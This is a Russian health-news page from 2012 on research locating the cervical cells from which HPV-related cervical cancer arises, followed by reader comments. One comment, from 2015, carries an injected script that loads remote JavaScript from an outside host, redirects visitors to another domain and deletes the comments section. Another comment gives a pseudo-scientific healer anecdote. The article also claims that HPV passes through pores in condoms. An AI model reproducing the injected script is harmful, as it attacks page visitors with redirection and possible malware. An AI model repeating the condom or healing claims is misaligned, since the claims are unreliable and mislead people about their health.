Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Откуда развивается рак ше...  >>  Откуда развивается рак шейки матки? Ученые нашли ответ!
 
Обратная связь
 

Откуда развивается рак шейки матки? Ученые нашли ответ!

Размер шрифта
19 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили группу клеток, которые дают начало раку шейки матки. Особый интерес представляет тот факт, что если удалить эти клетки, они не восстанавливаются.

рак шейки

Что такое рак шейки матки

Рак шейки матки – это злокачественное новообразование, которое развивается из эпителия шейки матки.

Основным фактором риска заболевания считается вирус папилломы человека (ВПЧ) 16 и 18 серотипов.

Заражение ВПЧ происходит преимущественно половым путем. Барьерные средства контрацепции зачастую не могут защитить  от ВПЧ, поскольку вирус имеет небольшие размеры и способен проникать сквозь дефекты и поры в изолирующем материале.

В 90% случаев вирус достаточно быстро уничтожается иммунной системой. Однако в остальных случаях ВПЧ удается преодолеть иммунную защиту, в результате чего появляются изменения шейки матки. Эти изменения носят название «предрак» и при отсутствии лечения дают начало раку.

Согласно данным Всемирной организации здравоохранения (ВОЗ), если у женщины в течение жизни было больше 10 половых партнеров, риск развития рака шейки матки повышается в 3 раза.

На ранних стадиях заболевания симптомы могут отсутствовать, а некоторые женщины могут испытывать дискомфорт. На более поздних стадиях появляются:

  • патологические вагинальные кровотечения;
  • кровотечения после полового акта, осмотра гинекологом;
  • изменения характера и длительности менструации;
  • боли в области малого таза;
  • боли во время полового акта.

Суть исследования

В течение нескольких десятков лет ученые не могли понять, почему рак шейки матки, причиной которого является ВПЧ, начинает развиваться на определенном участке шейки матки. Этот участок носит название переходной зоны: здесь один вид эпителия (цилиндрический) переходит в другой (многослойный плоский).

Недавно ученым, наконец, удалось разгадать загадку. Они обнаружили, что на поверхности клеток, расположенных в переходной зоне, находятся биомаркеры, которые присутствуют при всех формах рака шейки матки, вызванных ВПЧ. Благодаря этим биомаркерам можно определить, какие клетки шейки матки являются потенциально опасными, т.е. могут дать начало раку, а какие клетки не представляют угрозы.

Результаты

Ранее ученые доказали, что рак пищевода также развивается из небольшой группы клеток. Результаты настоящего исследования подтверждают данные, полученные для рака пищевода, а также открывают возможность для создания нового метода профилактики рака.

Ученые обнаружили, что после удаления потенциально опасных клеток они не восстанавливаются. Существует предположение, что удалив эти клетки у молодых женщин, можно будет снизить риск развития рака шейки матки. Данный метод может стать альтернативой вакцинации против ВПЧ, которая используется в настоящее время, но защищает только от двух серотипов вируса.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - АлександровАФ

19 июля 2012 в 12:09

Комментарий удален за нарушение Правил общения

2 - Маэстро

19 июля 2012 в 13:35

Цитировать   |   Пожаловаться

    Сударыняя Александрова ! Спасибо за Ваш ПОЛНОЦЕННЫЙ коментарий по теме... Не соглашусь как физик только с тем что технически невозможно улавливать сверхслабые токи... Да внутрь клетки " засунуть " какой нибудь измеритель пока невозможно. Но вне клеток ведь будет какое либо слабое излучение... Вон в космосе каждую частицу или фотон регистрируют ! По поводу " махания рук экстросенсос ". Для гипнабельных достаточно фразы ( которую показывали когда то во " ВЗГЛЯДе" ) -, которую говорила "экстросенша " : " Я напраляю на вас луч ЧЕРНОГО лазера ( полная билиберда! ) и он убивает вашу болезнь " И ведь после такого гипноза пациентки ведь " чувствовали "себя лучше... А я вот на себе почувствовал действие ( назвал бы его информационным ) настоящей целительницы -казачки , взявшей этот способ лечения от бабаушки.. Я лежал на спине , она сзади головы поднесла руки к моим ушам ( не касаясь ) Ничего не говорила , не двигала руками ! Минуты через 3 я почувствовал на ногах ( сверху ступней ) покалывание как многими иголками... Она сразу как это появилось спрашивает: " Что нибудь чувствуешь? " Я ответил утвердительно. Она говорит : " Это я тебя "прострелила" .  Я потом  попытался распрашивать- как она это делает ? Она мне сказала - не знаю, такое дано мне ВСЕВЫШНИМ и все... Сударыня, а почему мы все эти эффекты относим по своему консерватизму только к электромагнитному полю ? А что другого быть не может ( согласен с Вами пока человечеству неизвестному ) ? Я только для себя заключил -что оно информационное !    

Маэстро 19 июля 2012 в 13:35
Сударыняя Александрова !
 Не стоит хамить, милая моя, тем более, вы мало смыслите в организме человека, а все приборы мало что значат в диагностике заболеваний, так как мало видеть, что есть внутри человека, над ещё и понимать, что там происходит. Занимайтесь своими приборами и всё будет хорошо, когда здоровьем человека будут заниматься те, кто в этом разбирается. Я не заносите на страницы этого сайта хамство, не надо показывать свою элементарную невоспитанность.  Научитесь уважать людей.

4 - АлександровАФ

19 июля 2012 в 15:27

Комментарий удален за нарушение Правил общения

5 - zzzzzz

30 июня 2015 в 23:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Диагностика и лечение с помощью света   Сигналы SOS вашего организма   Новый тест скажет, будет у вас рак или нет   Созданы лекарства, которые обучают организм убивать рак. Это победа!  
06 февраля 2013Технология разведения коров позволяет определить риск развития рака 18 октября 2012Новый тест скажет, будет у вас рак или нет
 
09 августа 2012Раковые клетки теперь не смогут скрыться! 18 июля 2012Самое слабое место у женщин
 

Слайдшоу

1
Самая лучшая еда для похудения, сердца и против рака
Факторы, которые влияют на возникновение рака
Быстроразвивающиеся виды рака. Часть 1

Тесты

Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.